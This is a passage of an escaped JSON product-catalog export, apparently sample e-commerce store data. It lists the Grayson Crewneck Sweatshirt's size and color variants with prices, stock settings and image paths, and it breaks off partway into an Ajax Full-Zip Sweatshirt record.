t_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Grayson Crewneck Sweatshirt -M-White\",\"description\":\"<p>The Grayson Crewneck Sweatshirt gives you that ageless, classic look &ndash; a style that comes back around nearly every season. What\'s more, its performance and temp-control values are always in vogue.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with black accents.<br \\/>&bull; 80% cotton\\/20% polyester fleece. <br \\/>&bull; Patterned knit hood lining. <br \\/>&bull; Knit cuffs and waist. <br \\/>&bull; Pouch pocket. <br \\/>&bull; Curl edged seam detail<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"64\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"grayson-crewneck-sweatshirt-m-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh11-white_alt1.jpg,\\/m\\/h\\/mh11-white_back.jpg\",\"image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh11-white_alt1.jpg,\\/m\\/h\\/mh11-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"White\"},\"169\":{\"sku\":\"MH11-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Grayson Crewneck Sweatshirt -L-Orange\",\"description\":\"<p>The Grayson Crewneck Sweatshirt gives you that ageless, classic look &ndash; a style that comes back around nearly every season. What\'s more, its performance and temp-control values are always in vogue.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with black accents.<br \\/>&bull; 80% cotton\\/20% polyester fleece. <br \\/>&bull; Patterned knit hood lining. <br \\/>&bull; Knit cuffs and waist. <br \\/>&bull; Pouch pocket. <br \\/>&bull; Curl edged seam detail<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"64\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"grayson-crewneck-sweatshirt-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Orange\"},\"170\":{\"sku\":\"MH11-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Grayson Crewneck Sweatshirt -L-Red\",\"description\":\"<p>The Grayson Crewneck Sweatshirt gives you that ageless, classic look &ndash; a style that comes back around nearly every season. What\'s more, its performance and temp-control values are always in vogue.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with black accents.<br \\/>&bull; 80% cotton\\/20% polyester fleece. <br \\/>&bull; Patterned knit hood lining. <br \\/>&bull; Knit cuffs and waist. <br \\/>&bull; Pouch pocket. <br \\/>&bull; Curl edged seam detail<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"64\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"grayson-crewneck-sweatshirt-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"171\":{\"sku\":\"MH11-L-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Grayson Crewneck Sweatshirt -L-White\",\"description\":\"<p>The Grayson Crewneck Sweatshirt gives you that ageless, classic look &ndash; a style that comes back around nearly every season. What\'s more, its performance and temp-control values are always in vogue.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with black accents.<br \\/>&bull; 80% cotton\\/20% polyester fleece. <br \\/>&bull; Patterned knit hood lining. <br \\/>&bull; Knit cuffs and waist. <br \\/>&bull; Pouch pocket. <br \\/>&bull; Curl edged seam detail<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"64\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"grayson-crewneck-sweatshirt-l-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh11-white_alt1.jpg,\\/m\\/h\\/mh11-white_back.jpg\",\"image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh11-white_alt1.jpg,\\/m\\/h\\/mh11-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"White\"},\"172\":{\"sku\":\"MH11-XL-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Grayson Crewneck Sweatshirt -XL-Orange\",\"description\":\"<p>The Grayson Crewneck Sweatshirt gives you that ageless, classic look &ndash; a style that comes back around nearly every season. What\'s more, its performance and temp-control values are always in vogue.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with black accents.<br \\/>&bull; 80% cotton\\/20% polyester fleece. <br \\/>&bull; Patterned knit hood lining. <br \\/>&bull; Knit cuffs and waist. <br \\/>&bull; Pouch pocket. <br \\/>&bull; Curl edged seam detail<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"64\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"grayson-crewneck-sweatshirt-xl-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh11-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Orange\"},\"173\":{\"sku\":\"MH11-XL-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Grayson Crewneck Sweatshirt -XL-Red\",\"description\":\"<p>The Grayson Crewneck Sweatshirt gives you that ageless, classic look &ndash; a style that comes back around nearly every season. What\'s more, its performance and temp-control values are always in vogue.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with black accents.<br \\/>&bull; 80% cotton\\/20% polyester fleece. <br \\/>&bull; Patterned knit hood lining. <br \\/>&bull; Knit cuffs and waist. <br \\/>&bull; Pouch pocket. <br \\/>&bull; Curl edged seam detail<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"64\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"grayson-crewneck-sweatshirt-xl-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh11-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Red\"},\"174\":{\"sku\":\"MH11-XL-White\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Grayson Crewneck Sweatshirt -XL-White\",\"description\":\"<p>The Grayson Crewneck Sweatshirt gives you that ageless, classic look &ndash; a style that comes back around nearly every season. What\'s more, its performance and temp-control values are always in vogue.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with black accents.<br \\/>&bull; 80% cotton\\/20% polyester fleece. <br \\/>&bull; Patterned knit hood lining. <br \\/>&bull; Knit cuffs and waist. <br \\/>&bull; Pouch pocket. <br \\/>&bull; Curl edged seam detail<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"64\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"grayson-crewneck-sweatshirt-xl-white\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=White\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh11-white_alt1.jpg,\\/m\\/h\\/mh11-white_back.jpg\",\"image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh11-white_alt1.jpg,\\/m\\/h\\/mh11-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"White\"},\"175\":{\"sku\":\"MH11\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"configurable\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Grayson Crewneck Sweatshirt \",\"description\":\"<p>The Grayson Crewneck Sweatshirt gives you that ageless, classic look &ndash; a style that comes back around nearly every season. What\'s more, its performance and temp-control values are always in vogue.<\\/p>\\n<p>&bull; Cream crewneck sweatshirt with black accents.<br \\/>&bull; 80% cotton\\/20% polyester fleece. <br \\/>&bull; Patterned knit hood lining. <br \\/>&bull; Knit cuffs and waist. <br \\/>&bull; Pouch pocket. <br \\/>&bull; Curl edged seam detail<\\/p>\",\"short_description\":null,\"weight\":null,\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Catalog, Search\",\"price\":\"64\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":null,\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=1,required_options=1,material=Fleece|Organic Cotton,pattern=Color-Blocked,climate=All-weather|Cool|Indoor|Spring|Windy,eco_collection=No,performance_fabric=No,erin_recommends=No,new=No,sale=No\",\"qty\":\"0\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":\"sku=MH11-XS-Orange,size=XS,color=Orange|sku=MH11-XS-Red,size=XS,color=Red|sku=MH11-XS-White,size=XS,color=White|sku=MH11-S-Orange,size=S,color=Orange|sku=MH11-S-Red,size=S,color=Red|sku=MH11-S-White,size=S,color=White|sku=MH11-M-Orange,size=M,color=Orange|sku=MH11-M-Red,size=M,color=Red|sku=MH11-M-White,size=M,color=White|sku=MH11-L-Orange,size=L,color=Orange|sku=MH11-L-Red,size=L,color=Red|sku=MH11-L-White,size=L,color=White|sku=MH11-XL-Orange,size=XL,color=Orange|sku=MH11-XL-Red,size=XL,color=Red|sku=MH11-XL-White,size=XL,color=White\",\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh11-white_alt1.jpg,\\/m\\/h\\/mh11-white_back.jpg\",\"image\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh11-white_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh11-white_alt1.jpg,\\/m\\/h\\/mh11-white_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"1\",\"required_options\":\"1\",\"material\":\"Fleece|Organic Cotton\",\"pattern\":\"Color-Blocked\",\"climate\":\"All-weather|Cool|Indoor|Spring|Windy\",\"eco_collection\":\"No\",\"performance_fabric\":\"No\",\"erin_recommends\":\"No\",\"new\":\"No\",\"sale\":\"No\"},\"176\":{\"sku\":\"MH12-XS-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Ajax Full-Zip Sweatshirt -XS-Blue\",\"description\":\"<p>The Ajax Full-Zip Sweatshirt makes the optimal layering or outer piece for archers, golfers, hikers and virtually any other sportsmen. Not only does it have top-notch moisture-wicking abilities, but the tight-weave fabric also prevents pilling from repeated wash-and-wear cycles.<\\/p>\\n<p>&bull; Mint striped full zip hoodie.<br \\/>&bull; 100% bonded polyester fleece.<br \\/>&bull; Pouch pocket.<br \\/>&bull; Rib cuffs and hem. <br \\/>&bull; Machine washable.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible 